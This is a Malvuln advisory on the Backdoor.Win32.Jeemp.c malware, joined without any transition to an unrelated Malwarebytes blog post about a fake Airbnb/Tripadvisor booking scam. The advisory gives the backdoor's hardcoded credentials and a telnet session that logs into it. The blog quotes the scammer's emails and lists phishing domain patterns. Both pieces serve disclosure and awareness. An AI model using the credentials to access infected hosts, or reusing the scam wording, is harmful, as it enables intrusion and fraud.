    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d6b192a4027c7d635499133ca6ce067f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Jeemp.cVulnerability: Cleartext Hardcoded CredentialsDescription: The malware listens on three TCP ports which are randomized e.g. 9719,7562,8687,8948,7376,8396 so forth. There is an ESMTP server component "jeem.mail.pv" requiring authentication for the GDATA, SDATA commands and sample is packed using UPX. However, it is trivial to unpack using the -d flag which reveals the cleartext hardcoded credentials "jeepower" and "jeespower" in the PE file.Family: JeempType: PE32MD5: d6b192a4027c7d635499133ca6ce067fVuln ID: MVID-2024-0672Dropped files: msrexe.exeDisclosure: 02/28/2024Exploit/PoC:TELNET x.x.x.x 7562220 jeem.mail.pv ESMTPHELO hate250 okGDATA250 okNeed passwordjeepower[prx]#######250 okSDATA250 okNeed passwordabc123!503 wrong!SDATA250 okNeed passwordjeespower250 okDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Jeemp.c MVID-2024-0672 Hardcoded Credential

One of our researchers was targeted by a scammer advertising on Airbnb and hosting a fake Tripadvisor website.

One of my co-workers who works on Malwarebytes’ web research team just witnessed a real life example of how useful his work is in protecting people against scammers.

Stefan decided to visit Amsterdam with his girlfriend, and found a very nice and luxurious apartment in Amsterdam on Airbnb. In the description the owner asked interested parties to contact them by email.

> “The property is listed on several websites so contact me directly by mail to check for availability.”

So Stefan emailed the owner. They replied, asking Stefan to book the property through Tripadvisor because, they said, the Airbnb platform was having some problems and the fees were higher than on Tripadvisor.

> “My name is Carla Taddei, I am a co-host of this property, your dates are available.
> 
> The nightly rate is €250, also a €500 security deposit is required which will be fully refunded at the check out date (in case of no damages to the property). Cleaning and disinfection are included in the price. FREE CANCELLATION, FULL REFUND WITHIN 48 HOURS PRIOR THE CHECK IN.
> 
> Currently , we are encountering technical difficulties with the Airbnb calendar system, so we decided to use tripadvisor.com as our main platform. Because the Airbnb platform has very high fees, I choose to use only tripadvisor.com
> 
> If you would like to book our property, I need to know first some information about you, your name, your country and how many persons will stay with you in our property, also I want you to confirm me your email address. I will then make all the arrangements and I will send a tripadvisor invitation through tripadvisor.com in order to complete the reservation.”

Included in the mail were two shortened URLs which the owner claimed linked directly to the same property.

However, the link didn’t point to the real Tripadvisor site, but instead a fake one, which became clear when Malwarebytes Browser Guard popped up a warning advising Stefan not to continue.

Stefan received a mail that claimed to be from Tripadvisor, but more alarm bells were triggered when the sender email showed up as support@mailerfx.com — not exactly the email address you’d expect from Tripadvisor itself.

The owner sent a follow up email, saying the booking request had been sent out and insisting that Stefan had to pay and send confirmation before the booking could be validated.

> “Everything was arranged from my side and you should have the booking request by now. My device routed it to my promotion folders so just check all your email folders because you must have it.
> 
> Please note, the full payment including the security deposit is required on the same time. The deposit is required for the security of the property, if there are any damages or something else is missing from the property and it is fully refundable on the day when you leave the property.
> 
> Please forward and the payment confirmation once done so I can validate your booking.”

The scammer hoped Stefan would click on the booking button on the fake Tripadvisor site. If he had done, he would have seen a prompt to register with ‘Tripadvisor’.

One step further and he’d have been asked to enter his credit card details, at which point he would have been likely to pay a lot more than the agreed €2000 for an apartment he would never see from the inside.

Further research based on the URL to the fake Tripadvisor website showed us that these scammers have probably been active for quite some time.

We found 220 websites related to this particular scam campaign. 26 of them were structured similar to tripadvisor-pre-approved-cdc0-4188-b6e5-0e742976f964.nerioni.cfd, and related sites. And 194 were structured similar to airbnb-pre-approved-0e03cd9c-7f5e.mucolg.buzz, and related sites.

**How to recognize and avoid scams**

There are several ways in which this procedure should have set your scam spidey senses in action, even if you’re not a professional like Stefan.

*   When it’s too good to be true, it’s probably not true. Don’t fall for a ‘good deal’ that turns out to be just the opposite.
*   Book directly via the platform you are on. If someone tries to get you to do something that’s not typical behaviour for that service, then they may well be up to no good.
*   Check the links in the emails are going to where you expect. Even though the links in the email say tripadvisor.com, in reality they pointed to tinyurl.com. The use of URL shorteners where there is no actual need to shorten a URL is often done to obfuscate the link.
*   In the same vein, check the address in your browser’s address bar to check if it is going to where you would expect. The fake Tripadvisor site was hosted at https://tripadvisor-pre-approved-7f18-4bf6-8470-a6d44541e783.tynoli.cfd/d07f/luxury-apartment-for-rent-in-amsterdam/f47fde which has been taken offline now.
*   Don’t get rushed into making decisions. Scammers are always trying to create a sense of urgency so you click before you can think.
*   Double check the website again before entering personal details or financial information.
*   Keep your software updated and use a web filter that will alert you to suspicious sites.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#web